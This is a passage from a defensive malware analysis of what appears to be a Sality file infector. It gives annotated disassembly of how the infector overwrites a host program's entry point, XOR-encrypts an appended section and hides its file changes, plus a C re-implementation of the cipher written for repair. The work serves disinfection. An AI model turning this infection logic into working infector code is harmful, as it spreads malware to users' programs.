1000288A . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002890 . 03D1 ADD EDX,ECX
10002892 . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
10002898 . 6BC0 28 IMUL EAX,EAX,28
1000289B . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028A1 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028A5 . 51 PUSH ECX
100028A6 . 68 30E20010 PUSH vcmgcd32.1000E230
100028AB . E8 F01E0000 CALL vcmgcd32.100047A0
100028B0 . 83C4 0C ADD ESP,0C
100028B3 . 8B15 54E20010 MOV EDX,DWORD PTR DS:[1000E254]
100028B9 . 81E2 00000080 AND EDX,80000000
100028BF . 85D2 TEST EDX,EDX
100028C1 . 75 43 JNZ SHORT vcmgcd32.10002906
100028C3 . A1 54E20010 MOV EAX,DWORD PTR DS:[1000E254]
100028C8 . 2D 00000080 SUB EAX,80000000
100028CD . A3 54E20010 MOV DWORD PTR DS:[1000E254],EAX
100028D2 . 6A 28 PUSH 28
100028D4 . 68 30E20010 PUSH vcmgcd32.1000E230
100028D9 . 33C9 XOR ECX,ECX
100028DB . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024]
100028E2 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
100028E8 . 03D1 ADD EDX,ECX
100028EA . 8B85 28FFFFFF MOV EAX,DWORD PTR SS:[EBP-D8]
100028F0 . 6BC0 28 IMUL EAX,EAX,28
100028F3 . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
100028F9 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
100028FD . 51 PUSH ECX
100028FE . E8 9D1E0000 CALL vcmgcd32.100047A0
10002903 . 83C4 0C ADD ESP,0C
10002906 > 68 D8000000 PUSH 0D8
1000290B . 68 10900010 PUSH vcmgcd32.10009010
10002910 . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002916 . 0395 0CFFFFFF ADD EDX,DWORD PTR SS:[EBP-F4]
1000291C . 52 PUSH EDX
1000291D . E8 7E1E0000 CALL vcmgcd32.100047A0
10002922 . 83C4 0C ADD ESP,0C
10002925 . 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
10002928 . 0345 CC ADD EAX,DWORD PTR SS:[EBP-34]
1000292B . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
1000292E . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C] ; write new section data
10002934 . 51 PUSH ECX ; /Arg2 => 00000000
10002935 . 8B55 B0 MOV EDX,DWORD PTR SS:[EBP-50] ; |
10002938 . 52 PUSH EDX ; |Arg1
10002939 . E8 32F4FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000293E . 83C4 08 ADD ESP,8
10002941 . 8945 B0 MOV DWORD PTR SS:[EBP-50],EAX
10002944 . 6A 01 PUSH 1 ; /Arg2 = 00000001
10002946 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
1000294B . E8 C0F5FFFF CALL vcmgcd32.10001F10 ; \vcmgcd32.10001F10
10002950 . 83C4 08 ADD ESP,8
10002953 . 6A 7B PUSH 7B ; save original OEP 7B bytes
10002955 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
1000295A . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
10002960 . 50 PUSH EAX
10002961 . 68 70E20010 PUSH vcmgcd32.1000E270
10002966 . E8 351E0000 CALL vcmgcd32.100047A0
/*
100047A0_fun(pDest, pSrc, dwLen);
*/
1000296B . 83C4 0C ADD ESP,0C
1000296E . 6A 7B PUSH 7B ; save to another mem
10002970 . 68 70E20010 PUSH vcmgcd32.1000E270
10002975 . 68 76960010 PUSH vcmgcd32.10009676
1000297A . E8 211E0000 CALL vcmgcd32.100047A0
1000297F . 83C4 0C ADD ESP,0C
10002982 . 6A 7B PUSH 7B ; write new 7B bytes overwrite OEP
10002984 . 8D8D 30FFFFFF LEA ECX,DWORD PTR SS:[EBP-D0]
1000298A . 51 PUSH ECX
1000298B . 8B15 94E60010 MOV EDX,DWORD PTR DS:[1000E694]
10002991 . 0395 18FFFFFF ADD EDX,DWORD PTR SS:[EBP-E8]
10002997 . 52 PUSH EDX
10002998 . E8 031E0000 CALL vcmgcd32.100047A0
1000299D . 83C4 0C ADD ESP,0C
100029A0 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100029AA . EB 0F JMP SHORT vcmgcd32.100029BB
100029AC > 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC] ; ???????? cf, D0 offset's data equal 11h
100029B2 . 83C0 01 ADD EAX,1
100029B5 . 8985 14FFFFFF MOV DWORD PTR SS:[EBP-EC],EAX
100029BB > 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],7C
100029C2 . 73 2A JNB SHORT vcmgcd32.100029EE
100029C4 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100029CA . 0FBE940D 30FF>MOVSX EDX,BYTE PTR SS:[EBP+ECX-D0]
100029D2 . 83FA 11 CMP EDX,11
100029D5 . 75 15 JNZ SHORT vcmgcd32.100029EC
100029D7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100029DD . 0FBE8C05 31FF>MOVSX ECX,BYTE PTR SS:[EBP+EAX-CF]
100029E5 . 83F9 11 CMP ECX,11
100029E8 . 75 02 JNZ SHORT vcmgcd32.100029EC
100029EA . EB 02 JMP SHORT vcmgcd32.100029EE
100029EC >^ EB BE JMP SHORT vcmgcd32.100029AC
100029EE > 6A 04 PUSH 4
100029F0 . 8D55 C4 LEA EDX,DWORD PTR SS:[EBP-3C]
100029F3 . 52 PUSH EDX
100029F4 . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
100029FA . 0385 14FFFFFF ADD EAX,DWORD PTR SS:[EBP-EC]
10002A00 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A06 . 03C8 ADD ECX,EAX
10002A08 . 51 PUSH ECX
10002A09 . E8 921D0000 CALL vcmgcd32.100047A0
10002A0E . 83C4 0C ADD ESP,0C
10002A11 . FF15 30100010 CALL DWORD PTR DS:[<&KERNEL32.GetTickCount>] ; [GetTickCount
10002A17 . 0345 B8 ADD EAX,DWORD PTR SS:[EBP-48]
10002A1A . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002A1D . 6BC0 03 IMUL EAX,EAX,3
10002A20 . 66:8945 B4 MOV WORD PTR SS:[EBP-4C],AX ; random 16-bit encryption/decryption factor = (GetTickCount + [EBP-48] + [EBP-38]) * 3
10002A24 . 6A 02 PUSH 2
10002A26 . 8D55 B4 LEA EDX,DWORD PTR SS:[EBP-4C]
10002A29 . 52 PUSH EDX
10002A2A . 8B85 18FFFFFF MOV EAX,DWORD PTR SS:[EBP-E8]
10002A30 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002A36 . 8D5401 77 LEA EDX,DWORD PTR DS:[ECX+EAX+77] ; store the factor in clear at OEP+77h (inside the stub)
10002A3A . 52 PUSH EDX
10002A3B . E8 601D0000 CALL vcmgcd32.100047A0
10002A40 . 83C4 0C ADD ESP,0C
10002A43 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],2800 ; XOR-encrypt the 5000h-byte buffer at 100090E8 (2800h words: saved OEP bytes + new section data)
10002A4D . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
10002A54 > 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C] ; encryption/decryption factor
10002A57 . 25 FFFF0000 AND EAX,0FFFF
10002A5C . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A62 . 0FAFC8 IMUL ECX,EAX
10002A65 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
10002A6B . D1E2 SHL EDX,1
10002A6D . 2BCA SUB ECX,EDX
10002A6F . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A72 . 66:8B1445 E89>MOV DX,WORD PTR DS:[EAX*2+100090E8]
10002A7A . 66:33D1 XOR DX,CX
10002A7D . 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C]
10002A80 . 66:891445 E89>MOV WORD PTR DS:[EAX*2+100090E8],DX
10002A88 . 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
10002A8E . 83E9 01 SUB ECX,1
10002A91 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
10002A97 . 8B55 C4 MOV EDX,DWORD PTR SS:[EBP-3C]
10002A9A . 83C2 01 ADD EDX,1
10002A9D . 8955 C4 MOV DWORD PTR SS:[EBP-3C],EDX
10002AA0 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],0
10002AA7 .^ 75 AB JNZ SHORT vcmgcd32.10002A54
/* Encryption algorithm (the loop above, in C-like pseudocode)
dwEC = 0x2800;              // word counter, counts down
dw3C = 0;                   // word index into the buffer at 100090E8
LOOP1:
  dwEax = dw4C & 0xFFFF;    // 16-bit encryption/decryption factor
  dwEcx = dwEC * dwEax;
  dwEdx = dwEC << 1;
  dwEcx -= dwEdx;           // keystream word = (dwEC * factor - 2 * dwEC) & 0xFFFF
  dx = *(WORD *)(0x100090E8 + dw3C * 2);
  dx ^= cx;
  *(WORD *)(0x100090E8 + dw3C * 2) = dx;
  dwEC--;
  dw3C++;
  if (dwEC != 0) goto LOOP1;

The keystream depends only on the factor and the word position, and the operation
is a plain XOR, so running the same loop again with the same factor decrypts.
*/
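The loop above is the whole cipher, so it is worth seeing it as working code. The following C is an added example written for this page, not code from the original post or from the attached repair demo. It re-implements the factor derivation and the XOR loop exactly as the listing shows them, then takes the repair-side view: the factor is stored in clear at OEP+77h, so a tool reads it back, decrypts the appended 5000h-byte section and pulls the saved 7Bh original OEP bytes out of it. The buffer offset of those bytes (58Eh) is derived from the addresses in the listing (10009676 - 100090E8); the tick value, the stack values and the fake section content are constructed test data, and the function names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constants taken from the listing above. */
#define SALITY_BUF_BYTES  0x5000   /* size of the buffer at 100090E8; the loop runs 0x2800 words */
#define SALITY_BUF_WORDS  (SALITY_BUF_BYTES / 2)
#define SALITY_STUB_LEN   0x7B     /* original bytes at the OEP that the stub overwrites */
#define SALITY_OEP_COPY   0x58E    /* 10009676 - 100090E8: offset of the saved OEP bytes in the buffer */
#define SALITY_KEY_OFS    0x77     /* the 16-bit factor is written at OEP + 0x77 */

/* Factor derivation at 10002A11..10002A20: (GetTickCount() + [EBP-48] + [EBP-38]) * 3, low 16 bits. */
uint16_t sality_factor(uint32_t tick, uint32_t a, uint32_t b)
{
    return (uint16_t)((tick + a + b) * 3u);
}

/* One keystream word for counter i (the loop counts i from 0x2800 down to 1):
 * ((i * key) - (i << 1)) mod 2^16, i.e. i * (key - 2) mod 2^16. */
uint16_t sality_keystream(uint16_t key, uint32_t i)
{
    return (uint16_t)(i * (uint32_t)key - (i << 1));
}

/* In-place XOR of the whole buffer, word j paired with counter 0x2800 - j, as the loop
 * at 10002A54..10002AA7 does. XOR is its own inverse, so the same call both encrypts
 * (infector side) and decrypts (stub / repair side). Words are little-endian. */
void sality_xor_buffer(uint8_t buf[SALITY_BUF_BYTES], uint16_t key)
{
    uint32_t i = SALITY_BUF_WORDS;
    for (size_t j = 0; j < SALITY_BUF_WORDS; j++, i--) {
        uint16_t w = (uint16_t)(buf[2 * j] | (buf[2 * j + 1] << 8));
        w ^= sality_keystream(key, i);
        buf[2 * j]     = (uint8_t)w;
        buf[2 * j + 1] = (uint8_t)(w >> 8);
    }
}

/* Repair side: the factor sits in clear at OEP+0x77 of the infected file, so no guessing is needed. */
uint16_t sality_read_factor(const uint8_t *oep_stub)
{
    return (uint16_t)(oep_stub[SALITY_KEY_OFS] | (oep_stub[SALITY_KEY_OFS + 1] << 8));
}

/* Decrypt a copy of the appended section and extract the saved original OEP bytes. */
void sality_recover_oep(const uint8_t section[SALITY_BUF_BYTES], uint16_t key,
                        uint8_t out[SALITY_STUB_LEN])
{
    uint8_t tmp[SALITY_BUF_BYTES];
    memcpy(tmp, section, SALITY_BUF_BYTES);
    sality_xor_buffer(tmp, key);
    memcpy(out, tmp + SALITY_OEP_COPY, SALITY_STUB_LEN);
}

/* Self-check on constructed data: encrypt a fake buffer the way the infector does,
 * then recover the "original OEP" bytes the way a repair tool would. Returns 1 on success. */
int sality_selftest(void)
{
    static const uint8_t prologue[5] = { 0x55, 0x8B, 0xEC, 0x6A, 0xFF };   /* constructed stand-in for OEP code */
    static uint8_t section[SALITY_BUF_BYTES];
    uint8_t stub[SALITY_STUB_LEN];
    uint8_t original[SALITY_STUB_LEN];
    uint8_t recovered[SALITY_STUB_LEN];

    for (size_t k = 0; k < SALITY_BUF_BYTES; k++) section[k] = (uint8_t)(k * 7);   /* filler */
    memset(original, 0x90, sizeof original);
    memcpy(original, prologue, sizeof prologue);
    memcpy(section + SALITY_OEP_COPY, original, SALITY_STUB_LEN);

    uint16_t key = sality_factor(0x0012D687u, 0x400u, 0x1000u);   /* constructed tick / stack values */
    sality_xor_buffer(section, key);                              /* infector side */

    memset(stub, 0xCC, sizeof stub);                              /* fake stub; only offset 0x77 matters here */
    stub[SALITY_KEY_OFS]     = (uint8_t)key;
    stub[SALITY_KEY_OFS + 1] = (uint8_t)(key >> 8);

    sality_recover_oep(section, sality_read_factor(stub), recovered);   /* repair side */
    return memcmp(recovered, original, SALITY_STUB_LEN) == 0;
}

int main(void)
{
    printf("sality_selftest: %s\n", sality_selftest() ? "ok" : "FAILED");
    return 0;
}
```

The keystream is linear in the word counter and the key space is 16 bits, so even without the stored factor a known-plaintext guess over 65536 candidates would break it; in practice the repair path never needs that, because the infector writes the factor into the stub it leaves at the OEP.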
10002AA9 . 68 00500000 PUSH 5000
10002AAE . 68 E8900010 PUSH vcmgcd32.100090E8
10002AB3 . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002AB8 . 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
10002ABB . 50 PUSH EAX
10002ABC . E8 DF1C0000 CALL vcmgcd32.100047A0 ; write the encrypted 5000h-byte buffer into the new (last) section at file offset [EBP-38]
10002AC1 . 83C4 0C ADD ESP,0C
10002AC4 > 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002ACA . 51 PUSH ECX ; /BaseAddress = mapped view base from [1000E694]
10002ACB . FF15 78100010 CALL DWORD PTR DS:[<&KERNEL32.UnmapViewOfFile>] ; \UnmapViewOfFile
10002AD1 . 8B15 10E20010 MOV EDX,DWORD PTR DS:[1000E210]
10002AD7 . 52 PUSH EDX ; /hObject = handle from [1000E210]
10002AD8 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002ADE . 6A 00 PUSH 0 ; /Origin = FILE_BEGIN
10002AE0 . 6A 00 PUSH 0 ; |pOffsetHi = NULL
10002AE2 . 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50] ; |
10002AE5 . 50 PUSH EAX ; |OffsetLo
10002AE6 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
10002AEC . 51 PUSH ECX ; |hFile
10002AED . FF15 88100010 CALL DWORD PTR DS:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
10002AF3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC]
10002AF9 . 52 PUSH EDX ; /hFile
10002AFA . FF15 84100010 CALL DWORD PTR DS:[<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile
10002B00 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
10002B06 . 50 PUSH EAX ; /pLastWrite
10002B07 . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
10002B0A . 51 PUSH ECX ; |pLastAccess
10002B0B . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
10002B0E . 52 PUSH EDX ; |pCreationTime
10002B0F . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
10002B15 . 50 PUSH EAX ; |hFile
10002B16 . FF15 F8100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; \SetFileTime
10002B1C > 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC]
10002B22 . 51 PUSH ECX ; /hObject
10002B23 . FF15 F4100010 CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; \CloseHandle
10002B29 . 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]
10002B2C . 52 PUSH EDX ; /FileAttributes
10002B2D . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002B30 . 50 PUSH EAX ; |FileName
10002B31 . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002B37 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B3E . EB 10 JMP SHORT vcmgcd32.10002B50
10002B40 . B8 01000000 MOV EAX,1
10002B45 . C3 RETN
10002B46 . 8B65 E8 MOV ESP,DWORD PTR SS:[EBP-18]
10002B49 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002B50 > 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]
10002B53 . 25 FF000000 AND EAX,0FF
10002B58 > 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]
10002B5B . 64:890D 00000>MOV DWORD PTR FS:[0],ECX
10002B62 . 5F POP EDI
10002B63 . 5E POP ESI
10002B64 . 5B POP EBX
10002B65 . 8BE5 MOV ESP,EBP
10002B67 . 5D POP EBP
10002B68 . C3 RETN
III. Repair program demo
RepairSalityQ.rar